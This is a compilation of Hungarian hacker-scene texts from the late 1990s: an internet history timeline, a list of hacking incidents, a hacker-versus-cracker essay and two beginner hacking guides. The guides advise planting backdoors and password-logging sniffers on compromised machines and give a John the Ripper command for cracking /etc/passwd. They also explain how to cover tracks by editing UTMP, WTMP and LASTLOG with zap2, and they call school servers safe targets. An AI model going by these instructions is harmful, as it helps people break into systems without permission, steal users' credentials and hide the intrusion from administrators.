Marc Andereesen megírja az elsô grafikus webböngészô programot a Mosaicot. A<br />
www ezután szédületes tempóban kezd fejlôdni. Magyarországon is üzembe állítják<br />
az elsô webszervert a Budapesti Műszaki Egyetem folyamatszabályozási tanszékén.<br />
1994<br />
Az üzlet is egyre markánsabban jelen van a hálón: megalakul az elsô internetes<br />
pénzintézet, a First Virtual. A Mosaicot kifejlesztô Andereesen és a Silicon Graphics<br />
alapítója, Jim Clark létrehozza a Netscape vállalatot, amely Navigator nevű<br />
webböngészôjével rövidesen az Internet legfontosabb szoftvercégévé válik.<br />
1995<br />
A csomópontok száma 6 642 000!! A PC-világban szinte monopolhelyzetben lévô<br />
Microsoft megjelenik új operációs rendszerével, a Windows 95-tel (bár csak ne tette<br />
volna -Szilos ). Az operációs rendszerhez külön kapható kiegészítô csomag, a Plus<br />
tartalmazza a Microsoft saját webböngészôjét, a Mosaicból kifejlesztett Explorert.<br />
Megkezdôdik a böngészôháború a Netscape és a Microsoft között.<br />
1996<br />
Piackutató cégek adatai szerint csak ebben az évben 1,1 millió munkahelyet teremt a<br />
net. A végfelhasználók körülbelül 19 milliárd dollárt költenek internetes<br />
szoftvertermékekre.<br />
1997<br />
Becsült adat: idén 2,7 billió e-mail fordul meg a hálón. 2000-re ez a szám 6,9 billióra<br />
nôhet.<br />
35
Hackers’ Guide<br />
(A Népszabadság Világháló című melléklete alapján)<br />
- Szilos -<br />
************************************************************************************************<br />
A Byte magazin 98/4 -es számában megjelent cikke.<br />
A kalozkodas nem uj, az esetek gyakorisaga azonban ijeszto utemben novekszik.<br />
Minel kifinomultabb rendszerek jelennek meg, a kalozok annal elszantabban<br />
probalnak betorni.<br />
Ime nehany a kozismertebb esetek kozul:<br />
1977 John Draper egy gabonapelyhes dobozbol szarmazo jatek sippal utanozta az<br />
ingyenes telefonvonalat kero jelet.<br />
1978 Steve Jobs es Steve Wozniak, ket hobbi szamitogepes elkeszitett egy<br />
ugynevezett kek dobozt telekommunikacios szamitogepekre valo betoreshez.<br />
1979 A 17 eves Kevin Mitnicket harom honapra orizetbe vettek, es egy ev probaidore<br />
iteltek, amiert betört a Pacific Bell COSMOS telefonkozpontjaba.<br />
1983 Mitnicket hat honapra afiatalkoruak bortonebe csuktak, miutan betort a<br />
Pentagon szamitogepere.<br />
1984 Megalakult a 2600 Magazine: The Hacker Quarterly<br />
1987 Mitnicket 36 honap felfuggesztettre iteltek, amiert egy kaliforniai cegtol<br />
software-t lopott.<br />
1988 Robert Morris egy virus segitsegevel 6000 szamitogepet tett tonkre az<br />
Interneten. Megalakult a Computer Emergency Response Team.<br />
1989 Mitnick bunosnek vallotta magat szamitogepes csalas, es illegalis, tavolsagi<br />
hivashoz szukseges eleresi kodok birtoklasanak (ez utobbi kapcsolodik az 1988-ban<br />
a Digital Equipment Corp. szamitogepei elleni kalozakciohoz) buntetteben. Egy ev<br />
bortonre es hat honap felfuggesztettre iteltek.<br />
1990 Morrist harom honap felfuggesztettre, 400 ora kozmunkara es 10 000 dollar<br />
birsagra iteltek 1988-ban elkovetett buneert.<br />
1992 A Masters of Deception bandat bunosnek talaltak szamitogepes<br />
buncselekmenyek es osszeeskuves vadjaban. A tagok hat honap es egy ev kozotti<br />
szabadsagvesztest kaptak. Mitnick betort a Packard Bell szamitogepeire, amiert<br />
szabadulasa utani harom ev rendori felugyeletre iteltek. Megszokott, mielott az FBI<br />
elkapta volna.<br />
36
Hackers’ Guide<br />
1993 Justin Tunner Petersent tobb rendbeli szamitogepes csalasert, koztuk egy 150<br />
000 dollaros atutalasert letartoztattak. Iteletet csokkentettek, miutan feladott mas<br />
kalozokat, koztuk Mitnicket. Kesobb csatlakozott az FBI-hoz.<br />
1994 A kaliforniai DMV 1 millio dollaros dijat tuzott ki Mitnick letartoztatasaert, amiert<br />
az csalard modon probalt jogositvanyt szerezni maganak.<br />
1995 Haromevi menekules utan Mitnicket Petersen segitsegevel letartoztattak, es 23<br />
rendbeli szamitogepes csalassal vadoltak. Vlagyimir Levint a Citibankbol 10 millio<br />
dollart ellopo orosz kalozbanda vezetesevel vadoltak, es Londonban letartoztattak.<br />
1996<br />
aprilis A 19 eves Christopher Schanotot kiengedtek a bortonbol, es hazi orizetben<br />
tartottak, miutan eliteltek a Southwestern Bell Telephone, a Bell Communications<br />
Research, a Spring es az SRI International szamitogepeire valo betoresert. Mitnick<br />
20 000 ervenyes hitelkartyaszamot lopott. Emellett bunosnek vallotta magat lopott<br />
mobiltelefon szamok hasznalataban es a probaido megserteseben ( a DEC gepeire<br />
valo betoresben). A varhato itelet 20 ev borton, plusz 2-3 ev a probaido<br />
megszegeseert.<br />
junius Amerikai es angol bankok, brokerhazak es befekteto cegek hajlandoak voltak<br />
olyan bunozoknek fizetni, akik szamitogepes rendszereik feltoresevel fenyegettek<br />
meg a cegeket.<br />
augusztus Kalozok bejutottak az Igazsagugyi Miniszterium honlapjara, es annak<br />
tartalmat uszito szovegekre es kepekre, peldaul Adolf Hitler fotojara csereltek. A<br />
helyet az Igazsagtalansag Miniszteriumava kereszteltek at.<br />
szeptember Mitnick es allitolagos tettestarsa, Lewis DePayne artatlannak vallotta<br />
magat a 2 es fel eves bunugyi kalozkodasaval kapcsolatban felhozott szovetsegi<br />
vadakkal szemben. A Mitnick elleni vadak 25, 1992 juniusa 1995 februarja kozott<br />
elkovetett szamitogepes betorest es ellenszegulest tartalmaztak. Ha Mitnicket<br />
bunosnek talaljak, akar 100 ev bortonre is itelhetik.<br />
november Kalozok tortek be az America Online Court TV oldalaira, amely O. J.<br />
Simpson perevel kapcsolatos hireket tartalmazott.<br />
december Egy kaloz a denial of service tamadassal leallitotta a Web<br />
Communicationst, 3000 kereskedelmi web-hely tarolojat. Egy azonositatlan csoport<br />
betort az Egyesult Allamok legierejenek web oldalaira, megtoltve azt szines<br />
szlogenekkel, es remes animaciokkal.<br />
1997<br />
januar Egy magat D.A.M.M. -nek nevezo csoport betort a UNICEF web oldalaira. A<br />
lapokon szupermodellek kepeit es Mitnickre utalo feliratokat helyeztek el.<br />
A huszeves Yale diak, Nicholas Ryan bevallotta, hogy olyan programot keszitett,<br />
amely ingyenes elerest biztositott az AOL-hez. A vad kepviseloje 250 000 dollarig<br />
terjedo birsagot es ot ev bortont kert.<br />
februar A Chaos Computer Club kalozai megjelentek a nemet televizioban, es<br />
bemutattak egy ActiveX vezerlot, amely penzt von le bankszamlakrol es masikra<br />
helyezi at anelkul, hogy a PIN kodra szukseg volna.<br />
37
Hackers’ Guide<br />
marcius Kalozok tortek be a NASA web oldalaira es politikai kialtvanyt helyeztek el<br />
azon. A rendszergazda letiltotta az oldalak elereset. Egy massachussetsi fiatal - aki<br />
letiltotta a Worcesteri repuloter legi iranyitotornya fele meno kommunikaciot - lett az<br />
elso fiatalkoru, akit a szovetsegi birosag elott szamitogepes kalozkodas miatt<br />
eliteltek. A fiu elismerte bunet, cserebe ket ev felfuggesztettet, birsagot es<br />
kozszolgalati munkat kapott. Kaloz tort be a Well-hez, jelszavakat lopott el,<br />
felhasznaloi adatokat es mas allomanyokat torolt, majd trojai programokat helyezett<br />
el a halozaton.<br />
aprilis Egy, a merevlemez osszes allomanyat torlo AOL4FREE.COM nevu trojai<br />
program terjedt az Interneten. Portugal kalozok tortek be az Indonez Hadsereg<br />
halozatara, amelynek modositasaval tiltakoztak a kormany kelet-timori politikaja<br />
ellen.<br />
Kalozok hatoltak be az Amnesty Internationalhoz, s a weben egy cigarettazo baba<br />
fenykepet helyeztek el.<br />
Május Carlos Felipe Salgado beismerte, hogy 100 000 hitelkartyaszamot lopott el<br />
egy San Diego-i gépről, valamint olyan programot telepitett, amely felismeri es rogziti<br />
az elofizetok jelszavait.<br />
Junius A Mezogazdasagi Miniszterium kulugyi szolgalata leallitotta honlapjat, miutan<br />
biztosagi problemakat fedezett fel.<br />
Mitnicket 22 honap, szovetsegi bortonben letoltendo szabadsagvesztesre iteltek,<br />
amiert illegalis mobiltelefon-kodokat birtokolt, es az 1989-es csalasat koveto<br />
megfigyelesi idoszakban megszegte a torvenyt.<br />
Oktober A ValuJet web oldalai lealltak, miutan kalozok lezuhano repulogepek kepeit,<br />
es kozvetlenul a ceg vezetoinek szolo kepeket helyeztek el rajta.<br />
1998<br />
Februar A SUid csoport egyik tagja behatolt az USA Kereskedelmi Miniszteriumanak<br />
oldalaira, es hamis informaciokkal toltotte meg azt. A Pentagon es az FBI kivizsgalta<br />
a kalozok azon sikeres kiserleteit, amelyekben nem rendszerezett informaciokat<br />
szereztek meg az orszag vedelmi szamitogepeirol. E betoresek soran a fegyveres<br />
erok minden agat tamadas erte, a megszerzett allomanyok kozott fizetesi es<br />
szemelyes adatok is talalhatok.<br />
Marcius A magat The Analyzernek nevezo kaloz betort a NetDex nevu kaliforniai<br />
Internet-szolgaltatohoz, otthagyott uzeneteben kaloztarsa letartoztatasa ellen<br />
tiltakozva. Az uzenet szerint az eredeti betoresert is o volt a felelos. A NASA,a<br />
haditengereszet es az egyetemek W95-ot es NT-t futtato gepei mind a denial of<br />
service tamadas celpontjaiva valtak. Az igy megtamadott szamitogep kek halalt hal.<br />
Az izraeli rendorseg letartoztatta a 18 eves Ehud Tenebaumot, alias The Analyzert, a<br />
Pentagon szamitogepeire valo betoresben jatszott szerepeert. Allitolag tobb tucat<br />
amerikai es izraeli allami, kereskedelmi es oktatasi rendszerbe hatolt be. Az izraeli<br />
hatosagok Tenebaum ket tizeneves vedencet is letartoztattak.<br />
Majus A L0pht csoport tagjai vallomast tettek a szenatus elott, amelyben azt<br />
allitottak, hogy fel oran belul kepesek az egesz Internetet leallitani.<br />
Szeptember Egy nappal azutan, hogy a Microsoft elkeszitette a Hotmail biztonsagi<br />
resenek javitasat, a kalozok megjelentek egy ezt semmise tevo JavaScript kóddal.<br />
38
Hackers’ Guide<br />
Kalozok hatoltak be a The New York Times web oldalaira, es 150 000 vasarnapi<br />
latogatot inzultaltak ellenseges kepekkel.<br />
Miutan az oldalakat helyreallitottak, a kalozok ismet visszaallitottak a modositott<br />
kezdooldalt.<br />
Az egyiptomi rendorseg letartoztatott két kalozt, akik lopott hitelkartya szamokkal 147<br />
000 dollar erteku pornograf kepet, illetve filmet toltottek le.<br />
A kinai rendorseg elfogta Yang Wei programozot, aki betort egy orszagos<br />
szamitogep halozatba, es visszafejtett tobb, mint 500 azonositot es jelszot.<br />
A 28 eves Aaron Blossert azzal vadoltak, hogy behatolt az U.S. West szamitogepes<br />
rendszerebe, es tobb, mint 2500 szamitogepet egy 350 eves matematikai problema<br />
megoldasara hasznalt fel. Ekozben megszerezte a U.S. West 15 000<br />
munkaallomasanak jelszavat, es a kodolt anyag nagy reszet tovabbitotta az<br />
internetre.<br />
Eredeti: frater frater2@egon.gyaloglo.hu<br />
- H3XR00T -<br />
http://hexnet.hpage.<br />
net/<br />
************************************************************************************************<br />
A Hacker és társai<br />
Kezdés<br />
Én most szives engedelmetekkel az IGAZI hackerről es hackelésről beszelnék,<br />
egész cikkemben.<br />
A hekker, vagyis hacker nem egy internetes kalózt jelentett régen, hanem egy<br />
programozó Gurut, aki arra törekedett, hogy egy programot írva azt minél kisebbre<br />
irja meg, de persze ugyanazokkal a képességekkel. Szóval a hacker mára sem<br />
hagyta el igazi mivoltát, csak most nem offline, hanem online dolgozik. A hacker<br />
security hole-okat használ ki, amelyek vagy rootot adnak, vagy SuperUseri<br />
privilégiumokat. Igazából így születtek meg az exploitok, amelyek általában "C"<br />
programok. Az exploit egyszerre általában egy bugot használ ki, amely segít elérni a<br />
célját. Ennyit a hackerről.<br />
Most következzen, mit is csinál egy hacker... Egy hacker ha már elérte célját<br />
általában BackDoor-okat rak fel az áldozati gépre, amelyek abban segítenek, ha az<br />
eredeti rendszergazda jelszót vált. Ezen kivul nagy forgalmú gépre érdemes<br />
Sniffereket tenni. A sniffer csak root joggal működik, de megéri, mivel azt figyeli,<br />
amikor egy ártatlan user ftp-zik illetve telnetezik a gépről loggolja az account<br />
usernevét és jelszavát. FIGYELEM! A HACKER SOHA(!) SEM RONGÁL!!!<br />
Az ilyen emberek, akik hackereknek hiszik magukat, általában más programjaival<br />
39
Hackers’ Guide<br />
hatolnak be és azokkal ,,megsebzik'' a gépet. Ilyet soha ne tégy! Ne felejtsd el, hogy<br />
az értelmes hacker általában text filet hagy maga után, amelybe leírja mit kell<br />
kijavítani, vagy milyen módon jutott be (lehet az /etc/motd fájlba is). A snifferek és a<br />
backdoorok nem rongálnak és általában nem okoznak bajt.<br />
Továbbá léteznek olyan hackerek, akik néha ártalmatlan, néha ártalmas vírusokat<br />
írnak és ezeket terjesztik. Nemrég volt rá példa a "Melissa" nevezetű vírus készítője,<br />
akit vagy 20 év börtönbüntetésre ítélhetnek, ha minden vádpontban bűnösnek<br />
találják. Az ilyenek sem igazi hackerek, bár annak néznek ki, végülis profi<br />
programozók.<br />
Ezek után említenék pár dolgot a Crackerről (nem HACKER, CRACKER!). A cracker<br />
általában egy elbúsult ember, aki nem találta meg a Neten a helyét. Soha ne<br />
keverjük össze a hackerrel! A cracker maximum amatőr programozó, de még talán<br />
az sem. Szóval a cracker mások által írt programokat használ, amelyeket nem ért,<br />
csak csupán használ. Hozzáteszem nem exploitokat! Ezeket kitanulja használni és<br />
ezzel elindul tesztelni, ha egyik nem megy az emberen neki, kipróbálja a másik<br />
progit. Az ilyen emberek azok, akik NetBust, BO-t, vagy ilyeneket használnak. A<br />
cracker sohasem tapasztalatból csinálja, amit csinál, hanem ösztönből. Én az<br />
ilyeneket semmibe veszem. Ők azért lettek ilyenek, mert nem sikerült befutni<br />
hackerként, ezért választották ezt a "munkát". Én elítélem őket. Ha be is jutnak egy<br />
szerverre, csak véletlen sikerült. Erről ennyit.<br />
Mit használ illetve nem használ egy hacker?<br />
Először is lejegyzem, nembaj, ha van olyan progid, amit nem használ, sose töröld le!<br />
Mindig hasznodra lehet.<br />
Használ/csinál/szükséges:<br />
• "C" compiler<br />
• Telnet :)<br />
• FTP :)<br />
• Notepad :)<br />
• Exploitok (akár netről is lehet leszedni, vagy írni)<br />
• Minél több oktató jellegű dokumentum --> Mint ez :)<br />
• Mindig olvasni új fejlesztéseket!<br />
• Egy anonym email<br />
• Minél több hackelt shell (Taiwan, Deutsch, stb.)<br />
• Agy ("Use your brain and u have a good day :)" /Pac)<br />
• Víruskeresők, kódoló progik<br />
Ezeket használja, csinálja, szükségesnek tartja egy hacker...<br />
Igazából nem tudom hova soroljam a John the Ripper nevezetű progit, amely az<br />
/etc/passwd filet pörgeti egy szótár segítségével, vagy önmagával (single crack<br />
mode).<br />
Az ilyen se kell, de nem baj, ha van. Ugyanis, ahogy egyszer Dudu barátom írta, ,,A<br />
passwd fájl törése nem hackelés''. Ezért nem írom még a tiltott holmikhoz :)<br />
40
Most nézzük mit nem használ, mit nem kell használnija, mit nem érdemes:<br />
• NetBus<br />
• BO, semmi trojan, semmi vírus<br />
• PortScanner (minek?)<br />
• Jack's password cracker<br />
• Nuke, DialUp killer<br />
• Spoofer, Flooder progik<br />
Hackers’ Guide<br />
Ezeket a progikat, amik ittvannak általában Crackerek használják. Semmi<br />
szükségünk rá.<br />
Amúgy van egy mondásom: ,,A Cracker hamarabb megfertőződik, mint áldozata''<br />
Erről ennyit, és itt most abbahagyom.<br />
Ki egyetért, ki nem...<br />
--> tHIS fILE iS cREATED wITH nOTEPAD
Hackers’ Guide<br />
I. Gondolatok a Hackelesrol<br />
1.0 - Bevezeto<br />
1.1 - Hackerek, Phreakerek, Crackerek<br />
1.2 - Mielott belekezdenel<br />
1.3 - Pranoia<br />
II. Operacios rendszerek<br />
2.0 - Windows 9x<br />
2.1 - UNIX/Linux<br />
III. Passwd<br />
3.0 - Szukseges programok<br />
3.1 - A jelszofile (passwd)<br />
3.2 - A jelszofile feltorese<br />
3.3 - Utolso lepesek<br />
IV. Exploitok<br />
4.0 - Mik azok az exploitok?<br />
I. Gondolatok a hackelesrol<br />
1.0 - Bevezeto<br />
Az alabbiakban szeretnem mindenkivel megosztani azt amire egy kezdo hackernek<br />
szuksege van. Attol, hogy ezt elolvasod meg nem leszel hacker. Ez csak egy kis<br />
lokes lehet az utadon, ha a hackeles mellett dontesz.<br />
Mostanaban egyre gyakrabban hallani arrol, hogy komputerkalozok tortek be<br />
szuperszamitogepekbe, tinedzsert csiptek nyakon etc. Manapsag egy hackernek<br />
nagyon vigyaznia kell, jobban mint regen. A fejlett technika miatt a kopok<br />
egyre hatekonyabbak, a gepek okosabbak. Gondold at mielott belefogsz!<br />
1.1 - Hackerek, Phreakerek, Crackerek<br />
Gyakori, hogy az emberek osszekeverik a hackereket, phreakereket es a<br />
crackereket. A hacker halozatokon keresztul szamitogepekbe tor be. Celja nem<br />
a rombolas, hanem az epites. Kutat a tudas utan. Minden egyes szamitogep<br />
egy kihivas, legyen az egy iskola szervere vagy egy NATO szuperszamitogep.<br />
Sokan sajnos rossz dolgokra hasznaljak a tudasukat. Szamitogeprendszereket<br />
tesznek tonkre mosolyogva egyetlen gombnyomassal, penzt, adatokat tulajdonitanak<br />
el.<br />
A phreakerek a telefonvonalak manipulalasaval foglalkoznak. Biztos sokan<br />
lattatok a Hackers cimu filmet es abban Phreak Phantom-ot az o kis magnetofonjaval<br />
:)<br />
A crackerek programokat tornek fel. Nem egyszer a program megjelenese utan par<br />
oraval<br />
(vagy epp meg a megjelenes elott) le lehet tolteni az internetrol a feltort verziot.<br />
Sokan elitelik amit csinalnak, de el kene gondolkodni mi lenne ha nem lennenek.<br />
Ki tudna megfizetni 10000 ft-ot egy jatekproggiert, vagy 300000-et komolyabb<br />
kepszerkesztoert...<br />
42
1.2 - Mielott belekezdenel<br />
Hackers’ Guide<br />
Nem art elgondolkodni arrol, miert akarunk hackelni. Ha elkapnak akkor<br />
kegyetlenul ra lehet pacsalni. Kirughatnak az iskoladbol, (ill. munkahelyedrol)<br />
megvan arra az esely, hogy SOHA nem talalsz olyan munkat ahol szamitogep<br />
kozeleben lehetsz (vagy dolgozhatsz). Legrosszabb esetben bortonbuntetes a<br />
"jutalom". Nagyon kell vigyazni mit teszel, hiszen konnyen lehetnek az elso<br />
betoreseid az utolsok...<br />
1.3 - Paranoia<br />
Elso szamu szabaly: legy paranoias! Kodold az egesz vinyodat, ne beszelj arrol<br />
masnak, hogy epp min dolgozol...egyatalan senki ne tudjon rola hogy te mivel<br />
foglalkozol. Jegyzeteidet tarts a gepeden kodolva, papiron veletlenul se,<br />
kidobni pedig vegkepp ne dobd ki! Ezek kisse furan hangzanak de vegulis a<br />
bortonbuntetes is lehet vidam nemigaz?! :)<br />
II. Operacios rendszerek<br />
1.0 - Windows 9x<br />
Az emberek legtobbje valoszinuleg windows valamely verziojat hasznalja. A<br />
kezdetekben ez eleg is azonban ha igazan komolyan akarsz foglalkozni<br />
a hackelessel valamilyen Linux/UNIX oprendszerre lesz szukseged.<br />
2.0 - UNIX/Linux<br />
Az oprenszerek fellegvara. Csak azt nem tudsz megcsinalni vele amit nem<br />
akarsz. Legtobben a Linuxot hasznaljak mivel ingyenes. Nagyon stabil es<br />
biztonsagos. Es meg windows-os kezelofelulete is van! (X Windows) :)<br />
III. Passwd<br />
3.0 - A szukseges programok<br />
A UNIX alapu rendszerekben talalhato egy passwd nevu file ami a kovetkezokepp<br />
nezhet ki: jane:GXkGUFA1NofyM:203:10:JaneBailey:/aa/widget/jane:bin/sh<br />
Felhasznaloi nev: jane<br />
Kodolt jelszo: GXkGUFA1NofyM<br />
Azonosito szam: 203<br />
Csoportazonosito: 10<br />
GCOS mezo: JaneBailey<br />
Home konyvtar: /aa/widget/jane<br />
Kezdeti shell: /bin/sh<br />
3.2 - A jelszo file feltorese<br />
A login folyaman a megadott username es password utan a beutott pass<br />
osszehasonlitasra kerul a kodoltal es ha egyezik akkor beenged a rendszer.<br />
Azonban fel is torhetjuk a jelszot. Erre a legjobb megoldas valamilyen<br />
password cracker program hasznalata. Linux alatt a Crack, DOS/Win alatt a<br />
43
Hackers’ Guide<br />
John The Ripper a legjobb. Ezekhez meg szerenznunk kell egy dictionary filet<br />
ami azokat a loginokat/passokat tartalmazza amiket a cracker hasznalni fog.<br />
Egy pelda a John The Ripper hasznalatara:<br />
john.exe -w:dictionary.txt passwd<br />
Dictionary filet a www.hackersclub.com/km cimen talalsz vagy az ftp.ox.ac.uk-n.<br />
3.3 - Utolso lepesek<br />
Ha sikerult megszereznunk a root jelszot es beleptunk a rendszerbe akkor<br />
kilepes elott el kell tuntetni magunk utan a nyomokat. Ezt a logfileok<br />
modositasaval tehetjuk meg. 3 filet kell modositani: UTMP, WTMP, LASTLOG<br />
Ezt vagy manualisan tesszuk meg vagy vmi program segitsegevel (pl zap2).<br />
Azonban ne toroljuk le oket, mivel igy a rendszergazda konnyen eszreveheti<br />
hogy bent jartunk a rendszerben.<br />
El kell gondolkodnunk mekkora az esely a lebukasra. Ha egy oktatasi intezmeny<br />
szerverebe tortunk be valoszinuleg nem kell aggodnunk hiszen nem valoszinu, hogy<br />
hogy a rendszergazda azzal fogja tolteni az idejet, hogy kinyomoztasson minket<br />
es az iskolak tobbsege nem igazan all ugy anyagilag, hogy kideritsek ki jart a<br />
rendszerben. Ilyen esetekben ildomos kuldeni egy levelet, hogy mikent jutottal<br />
be, hogy fixaljak ki a bugot stb. Biztos ami biztos en az anonymous level mellett<br />
voksolok.<br />
IV. Exploitok<br />
4.0 - Mik azok az exploitok?<br />
Az exploitok olyan programok amelyek kihasznaljak egy rendszer hibajat, hogy<br />
azaltal root jogokat kaphass. Minden exploit mas, mindegyik mas resen keresztul<br />
aknazza ki a bugot.<br />
Nos ennyi lenne. Remelem mindent erhetoen fejtettem ki, laikusok szamara is<br />
erthetoen. Azt ajanlom ha igazi hacker akarsz lenni, olvass sokat aztan<br />
olvass meg tobbet es utana megtobbet es tobbet...<br />
Nehany hasznos link:<br />
News - www.rootshell.com<br />
Hackerz Hideout - www.hackersclub.com/km<br />
Thought on hack - www.extra.hu/hackerz<br />
Codemon hp-ja - www.extra.hu/CoDemon<br />
Hack adatbazis - www.neworder.box.sk<br />
CABLE BREAKERS - emperor.bdtf.hu/cb<br />
=====Cable<br />
Breakers=====================1999=========KerNel^Panic=============<br />
************************************************************************************************<br />
44
Ismertetô a hackelésrôl laikusoknak<br />
Hackers’ Guide<br />
Az itt leírtakat többnyire angol dokumentumok lefordítása után, a hasznos<br />
elemeket kiszûrve készítettem. Ez itt kizárólag ismertetô jellegû információ, a<br />
felhasználásáért semmilyen felelôséget nem vállalok, sôt az informatikai<br />
rombolást magam is elítélem!<br />
Ezek a tanácsok nem isteni sugallatok, ajánlom azonban mindazoknak, akik<br />
szeretnék kipróbálni magukat, de nem tudják hogyan kezdjenek hozzá. Hasznos<br />
lehet azonban az óvatos, és tanulni vágyó kezdô rendszergazdáknak is.<br />
Megpróbálok mindent magyarázni, akinek esetleg ezek a dolgok a könyökén jönnek<br />
már ki attól elnézést kell hogy kérjek.<br />
Amikor én eldöntöttem, hogy komolyabban szeretnék foglalkozni az imformatikával,<br />
egy idô múlva felmerült a hackerség kérdése. Elôször nem tudtam mit kezdeni az<br />
egész dologgal, hiszen nem tudtam hogy ez az egész hogyan is mûködik. Ebben<br />
szeretnek egy kis segítséget nyújtani, és segíteni eldönteni, hogy megéri-e nekik sok<br />
100 vagy 1000 órát rászánni erre a kicsit különös, és nem is éppen veszélytelen<br />
idôtöltésre.<br />
Tudnunk kell mindenek elôtt, hogy /a köznyelvben használt, általános/ hackerség<br />
ILLEGÁLIS, és ezt nem csak az USAban veszik igen komolyan! Ugyanakkor az<br />
eredeti hackerség fogalma teljesen legális! /hacker jargont ajánlom mindenki<br />
figyelmébe, ahol többek között a pontos meghatározást is megtalálhatja/<br />
3 informatikai törvenysértô alapeset létezik /nagyvonalakban/: a hacker (=><br />
halózatokon keresztül hatol be más rendszerekbe; az igazi hacker azonban nem tesz<br />
kárt bennük; fô célja az információ szerzés; nem feltétlenül jó programozó, jobban ért<br />
a hálózatok mélyének mûködéséhez), phreaker (=> egy különleges törvényen kívüli<br />
aki telefonhálózatok buherálására specializálódott), cracker (=> ô inkább programok<br />
feltörésével foglalkozik; jó programozó). A hármat rendszeresen keveri a köznyelv<br />
/fôleg a hackert és crackert/, sôtt, még néha saját maguk is rossszul tudják, hogy<br />
kicsodák. Visszatérve a lényegre természetesen akadnak mások is akik ebbe a<br />
kategóriába sorolhatóak, de most velük nem foglalkozok részletesen. Ha komolyan<br />
érdekel valakit a dolog, akkor sok olvasás után úgyis találkozni fog a többivel is. /itt<br />
újra felhívnám a figyelmet a hacker jargonra/<br />
Aki azt várja, hogy most majd megtanul hackelni 15 perc alatt, az jobb, ha itt most<br />
abba is hagyja az olvasást. Ugyanis nemhogy 15 hónap alatt, de még 15 év alatt<br />
sem lehet megtanulni mindent, arról nem is beszélve, hogy ez csak egy rövid<br />
áttekintés, azoknak akik semmit még semmit sem tudnak ezekrôl a dolgokról. Amit<br />
én itt összeírtam ebben az egész dokumentumban, az körülbelül annyi amennyit<br />
45
Hackers’ Guide<br />
Amstrong láthatott a Földbôl, amikor Holdra lépett... lényegében csak egy<br />
benyomás...<br />
A hackerségrôl általában:<br />
Fontosnak tartom, hogy úgy általában is írjak a hackerségrôl, ne csak hogy hogyan is<br />
kell, meg legális-e vagy nem. A hackerség egy "életforma" vagy inkább "életérzés",<br />
nem is sejti az átlag, vagy akár egy informatikához értô ember, hogy valójában<br />
milyen komoly dolog is ez az egész, ennek saját kúltúrája és társadalma van. A<br />
nyelve eredetileg angol, de ami a hackereknek köznyelv, az egy átlag embernek<br />
érthetetlen szakzsargon /nálam is letölthetôek hackerek által használt szlengek és<br />
szakszavak szótárai/. Lehet kettôs életet élni, de nem igazán lehet kicsit hackernek<br />
lenni. Ha valaki ért hozzá akkor már hacker, mégha gyakorlatlan és amatôr is. Egy<br />
hacker óvatos, nem beszél nyíltan semmirôl, még a legközelebbi rokonainak sem;<br />
nem mondja el, hogy éppen min dolgozik, és mit ért el.<br />
A hackerek az interneten valójában semmilyen hétköznapi embertípushoz nem<br />
hasonlíthatóak. Közel állnak egy csapat szemüveges professzornak és egy<br />
összetartó vad utcai bandának az ötvözetéhez, akiknek fegyvere a mérhetetlen<br />
szaktudás.<br />
Elöször lássuk, mire is lesz szükségünk a kezdetekhez!<br />
Fizikailag:<br />
• Computer. Tulajdonképpen a fajtája mindegy, mert minden platformra<br />
(=géptípus, mint: PC vagy Macintosh) megtalálhatóak a megfelelô programok.<br />
Az operációs rendszerrel (=a computert kezelô alap program, mint:<br />
Windows98, Windows95, MacOS, Unix, Linux) már komolyabban kell<br />
foglalkoznunk. Feltehetôleg a kezdôknek Windowsa van, esetleg MacOSe,<br />
ezzel sajnos nem fogunk tudni elérni sokmindent, de egyenlôre megfelel.<br />
Hozzáfûzöm, hogy nem kell elkeserednie annak, akinek nincs egy<br />
tizenszázezer megahertzes processzora, meg 3Dfx kártyája, meg 124Mega<br />
memoriája, ezek itt nem fognak hiányozni.(kivéve Brute Force feltöréseknel,<br />
ahol a gépünk "nyers erejét" fogjuk kihasznalni, hogy dekodoljunk egy jelszot<br />
peldául)<br />
46<br />
• Modem.<br />
• Internet elérés. Sajnos saját, otthoni internet elérés nélkül nagyon nehéz<br />
dolgunk lesz, mert szinte minden információt innen fogunk begyûjteni.<br />
• IRC vagy egy segítôkész computeres haver. /ajánlott/ Az IRC egy valós idejû<br />
beszélgeôs rendszert jelent, amelyre rakapcsolódva mindig fogunk olyanokat<br />
találni akik tudnak nekünk segíteni. Valamint filekat is küldhetünk vele, ez<br />
néha jól is jön, ha a file fogadója történetesen egy fileok fogadására<br />
konfigurált, valamilyen szerveren tanyázó robot program. Ez a rendszer már<br />
önmagaban is megér egy hatalmas dokumentációt, a linkgyûjteményemben<br />
fogtok találni ezzel kapcsolatban egészen sok segítséget. Elôször is ajánlatos<br />
letölteni egy IRC kliens programot, mellyel hozzákapcsolódhatunk a
hálózathoz. /Windowson mIRC, Macintoshon IRCle, Unix/Linux bitchX<br />
amennyire én tudom/<br />
Hackers’ Guide<br />
• Hálózati, illetve különbözô programozási nyelvekkel foglalkozó programok<br />
tömkelege, nyom-eltüntetôk, feltörô- és kódolóprogramok stb. No Comment...<br />
ezeket majd szép lassan be le7 gyûjteni, többnyire ingyenesek, és az<br />
internetrôll letölthetôek. /nálam a letölthetô szövegfilekba van sok ilyen<br />
beleírva, amelyet egy C fordítóval majd le lehet fordítani/<br />
Szellemileg:<br />
• Sok-sok türelem. /ismétlem: SOK/<br />
• Unix/Linux operációs rendszer ismerete. Hackereknek elengedhetetlen,<br />
egyébként igen erôsen ajánlott. Más, komolyabb hálózati OPrendszerek<br />
ismeretére is szükségünk lesz, legalább felületesen. /pl.: WindowsNT/<br />
Gondolom ez az elsô pont, ahol a legtöbb laikus lelkesedése kicsit alábbhagy.<br />
Erre azonban késôbb mindenképpen szükség lesz, elsajátítása magában is<br />
legalább egy fél év.<br />
• Programozási ismeretek. Crackereknek elengedhetetlen, de másoknak is<br />
szintén szüksége lesz rá, nehezen tudjuk kikerülni, legalább egy nyelvet kell<br />
ismernünk, hogy valamelyest megértsük az egész computeres világ<br />
mûködését. Legjobb ha a C nyelvet ismerjük, mert minden komolyabb<br />
helyzetben ezt használja mindenki, de kezdôknek ez irtó bonyolult lesz, ezért<br />
ezzel kezdeni nem ajánlatos.<br />
• Hálózatok mûködésének ismerete. Hackereknek elengedhetetlen.<br />
• Sok jó webes link. Ez fontos a gyors értesüléshez, és hogy anyagot és<br />
programokat találjunk segítségül. Sok hasznos link található nálam is, de jobb<br />
híján egy keresô siteon (linkgyûjteményemben is találsz ilyen keresô címet)<br />
lehet keresni ilyeneket.<br />
